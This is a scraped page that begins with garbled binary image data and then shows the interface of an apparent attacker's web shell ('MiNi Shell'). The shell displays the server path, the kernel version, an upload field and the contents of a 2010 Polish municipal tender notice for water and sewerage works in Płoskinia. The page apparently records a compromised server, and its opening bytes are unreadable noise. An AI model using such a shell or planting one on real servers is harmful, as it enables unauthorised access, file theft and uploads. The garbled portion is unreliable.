JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100125/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100125/21080-N-2010.html

<p class="kh_header"><b>Płoskinia: Budowa SUW Dąbrowa, wodociąg Dąbrowa-Płoskinia, kanalizacja Dąbrowa-Płoskinia oraz rozbudowa sieci wodociągowej</b><br>
<b>Numer ogłoszenia: 21080 - 2010; data zamieszczenia: 25.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina  Płoskinia , Płoskinia 8, 14-526 Płoskinia, woj. warmińsko-mazurskie, tel. 055 620 8600, faks 0-55 620 8602.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ploskinia-ug.bip-wm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa SUW Dąbrowa, wodociąg Dąbrowa-Płoskinia, kanalizacja Dąbrowa-Płoskinia oraz rozbudowa sieci wodociągowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest; 
Realizacja inwestycji pn. Budowa SUW Dąbrowa, wodociąg Dąbrowa-Płoskinia, kanalizacja Dąbrowa-Płoskinia oraz rozbudowa sieci wodociągowej polegającego na;
1. Budowie  stacji uzdatniania wody wraz z infrastrukturą towarzyszącą w miejscowości Dąbrowa, działka nr 167/1; 167/2;
Budowa SUW dostosowana pod potrzeby technologii uzdatniania wody, dwóch zbiorników retencyjnych V=50 m3, dróg wewnętrznych, ogrodzenia terenu.
PODSTAWOWE DANE OBIEKTU; powierzchnia zabudowy - 144,00 m2, powierzchnia użytkowa - 121,67 m2, kubatura - 585 m3, zbiornik retencyjny - 2x50 m3. Wydajność stacji wodociągowej wynosi: Qdmax = 720 m3/d, Qhmax = 61,20 m3/h.
2. Wykonania otworu studziennego nr 3 na terenie ujęcia wiejskiego w msc. DĄBROWA; Głębokość otworu studziennego 63 mb., wydajność eksploatacyjna ok. 42 m3/h. Po wykonaniu otworu studziennego wykonawca zobowiązany jest do opracowania hydro- geologicznej.
3. Przyłącze kanalizacji sanitarnej Dąbrowa - Gmina Płoskinia;
Domowe przepompownie ścieków szt. 4, kolektor grawitacyjny -30 mb., kolektor ciśnieniowy- 217,3 mb.
4. Sieć wod-kan  Dąbrowa-Płoskinia, gmina Płoskinia;
Sieć wodociągowa Rurociąg PE100 DN90 SDR17 L=16,0m; Rurociąg PE100 DN160 SDR17 L=4095,5m;  Sieć kanalizacji sanitarnej: kolektor ciśnieniowy PE100 DN110 SDR17 L= 4 363,0m; Kolektor ciśnieniowy PE100 DN75 SDR17 L=403,5m;  kolektor grawitacyjny PVC DN200 SDR41,L=2 228,5m.
5. Przepompownie ścieków sanitarnych dla inwestycji pod nazwą sieć wod-kan Dąbrowa- Płoskinia, Gmina Płoskinia;  na działki o numerach geodezyjnych: Obręb Dąbrowa: 247/3, 38/1  - szt. 2. 
6. Likwidacji studni wierconych nr 1 i nr 2 na terenie ujęcia wiejskiego w msc. PŁOSKINIA.
7. Pompownie wody dla inwestycji pod nazwą sieć wod-kan Dąbrowa-Płoskinia - Gmina Płoskinia;
Wykonanie pompowni wody szt. 4, na działkach o numerach geodezyjnych: Obręb Chruściel: 1/4, Obręb Płoskinia: 37/5, 38/2, Obręb Tolkowiec: 53.
8. Remont sieci kanalizacji sanitarnej Piórkowo - Gmina Płoskinia;
Sieć kanalizacji sanitarnej: Kolektor grawitacyjny PVC DN200 SDR41 L=237,0m.
9. Sieć wod-kan Gmina Płoskinia;
Sieć wodociągowa: Rurociąg PE100 DN90 SDR17 L=11 175,5m; Rurociąg TS DN90 SDR11 L=25,0m.
Przepinki przyłączy wodociągowych: szt. 7; rurociąg PE80 DN40 SDR11 L=6,0m szt. 3, rurociąg PE80 DN50 SDR11 L=128,0m szt. 4.Sieć kanalizacji sanitarnej: kolektor ciśnieniowy PE100 DN90 SDR17 L=3 035,2m; kolektor ciśnieniowy PE100 DN63 SDR17 L=262,0m kolektor grawitacyjny PVC DN200 SDR41 L=183,0m.
10.  Przepompownie ścieków sanitarnych dla inwestycji pod nazwą Sieć wod-kan Gmina Płoskinia; na działki o numerach geodezyjnych: Obręb Chruściel: 91/3, 177/23, 192.

Szczegółowy zakres robót określają dokumentacje techniczne, specyfikacje techniczne wykonania i odbioru robót i przedmiary robót.
W dokumentacji technicznej Remont sieci kanalizacji sanitarnej Piórkowo - Gmina Płoskinia ujęte jest wykonanie drogi dojazdowej oraz przyłączy do budynków mieszkalnych - realizacja tego zadania nie jest objęte postępowaniem przetargowym - zakres zgodny z przedmiarem robót.
W dokumentacji technicznej Sieć wod-kan Dąbrowa-Płoskinia, gmina Płoskinia ujęte jest wykonanie przyłączy kanalizacyjnych do budynków mieszkalnych - w postępowaniu przetargowym  do wykonania są przyłącza do granicy nieruchomości oraz odcinki, które służą do przyłączenia więcej niż jednego podmiotu - zakres zgodny z przedmiarem robót.

Realizacja przyłączy kanalizacyjnych ujętych w dokumentacjach Remont sieci kanalizacji sanitarnej Piórkowo - Gmina Płoskinia i Sieć wod-kan Dąbrowa-Płoskinia, gmina Płoskinia - zgodnie z załączonymi rysunkami.

Zamawiający informuje, iż podane w opisie przedmiotu zamówienia oraz projekcie budowlanym jakiekolwiek znaki towarowe, patenty czy pochodzenie - należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ i dopuszcza składanie ofert z urządzeniami równoważnymi o parametrach technicznych, eksploatacyjno-użytkowych nie gorszych - zgodnie z art. 29 ust. 3 ustawy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.25.20.00-8, 45.25.21.26-7, 45.23.13.00-8, 45.33.00.00-9, 45.11.00.00-1, 45.26.22.20-9, 45.23.24.23-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości; 80 000,00 PLN /słownie;  
osiemdziesiąt  tysięcy zł./. Forma wniesienia wadium - zgodnie z SIWZ<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Oferent ubiegający się o uzyskanie zamówienia musi spełnić następujące warunki uprawniające do ubiegania się o zamówienie publiczne oraz wykazać się zdolnością do wykonania zamówienia:
1. Spełniają warunki, określone przepisami art. 22 ust.1 ustawy dotyczące: 
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania; 
2) posiadania wiedzy i doświadczenia; 
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania  zamówienia; 
4) sytuacji ekonomicznej i finansowej. 
2.  Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy.
Ocena spełnienia powyższych warunków zostanie dokonana przez Zamawiającego w oparciu o dokumenty znajdujące się w ofercie, wykazane szczegółowo w punkcie VII SIWZ metodą spełnia/nie spełnia. 

Niespełnienie powyższych warunków, nie udokumentowanie spełnienia warunków lub też niewłaściwe udokumentowanie skutkować będzie wykluczeniem oferenta z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty, oświadczenia wymagane dla ważności oferty, które oferent winien dostarczyć w celu potwierdzenia spełnienia warunków udziału w postępowaniu;
1. Formularz ofertowy z wykorzystaniem wzoru /załącznik Nr 1/.
2. Kosztorys ofertowy.
3. Dowód wniesienia wadium.
4. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
5. Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzającego, że oferent nie zalega z opłacaniem podatków, opłat lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji Naczelnika urzędu Skarbowego, wystawionych nie wcześniej niż 3 miesiące prze upływem terminu składania ofert. 
6. Aktualne zaświadczenie z właściwego Oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych  płatności, lub wstrzymanie w całości wykonania decyzji  Oddziału Zakładu Ubezpieczeń Społecznych - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert .
7. Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt  4-8 ustawy - wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
8. Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt  9 ustawy - wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert- /dotyczy osób prawnych oraz jednostek organizacyjnych nie posiadających osobowości prawnej, której odrębne przepisy przyznają zdolność prawną/
9. Oświadczenie o spełnieniu warunków udziału w postępowaniu złożone na druku  
    stanowiącym - załącznik Nr 2.
10. Wykaz  wykonanych w okresie ostatnich 5 lat robót budowlanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z  podaniem ich wartości oraz daty i miejsca wykonania  /referencje/ - załącznik Nr  3;
- minimum jedno zadanie polegające na  budowie Stacji Uzdatniania Wody o wartości min. 900 tys. Brutto, 
-  minimum jedno zadanie polegające na budowie kanalizacji sanitarnej o długości  min. 8,0 km /kolektor+przyłącza/,
- minimum jedno zadanie polegające na budowie sieci wodociągowej o długości min 12,0  km /sieć + przyłącza/,
11. Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą  uczestniczyć w wykonywaniu zamówienia, wraz z informacją na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakres wykonywanych przez nich czynności oraz informacji o podstawie do dysponowania tymi osobami; uprawnienia oraz kopia zaświadczenia o wpisie do właściwej izby samorządu zawodowego /uprawnienia budowlane do kierowania robotami w specjalności; architektoniczno- budowlanej, sieci sanitarnych wod-kan., elektrycznej, geologicznej/-  załącznik Nr 4.
12. Wykaz podwykonawców przewidzianych do wykonywania zamówienia - jeżeli będą uczestniczyć w realizacji zamówienia dołączyć - załącznik nr 5
13. Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował Wykonawca z informacją o podstawie dysponowania tymi zasobami - załącznik Nr 6.
14. Polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej o wartości nie mniejszej niż 2 000 000 PLN.
15. Informację banku, w którym wykonawca posiada podstawowy rachunek bankowy, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w wysokości min. 1 000 000 zł, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
16. Harmonogram rzeczowo-finansowy - załącznik nr 8.
17. Pełnomocnictwo dla osoby reprezentującej Oferenta w postępowaniu /jeżeli oferenta reprezentuje przedstawiciel/.             

W przypadku składania oferty przez wykonawców występujących wspólnie dokumenty z punktów 4, 5,6, 7, 8, 9  muszą być złożony przez każdego wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ploskinia-ug.bip-wm.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Płoskinia, 14-526 Płoskinia.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.03.2010 godzina 10:00, miejsce: Urząd Gminy w Płoskini, 14-526 Płoskinia /pokój  nr 9 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com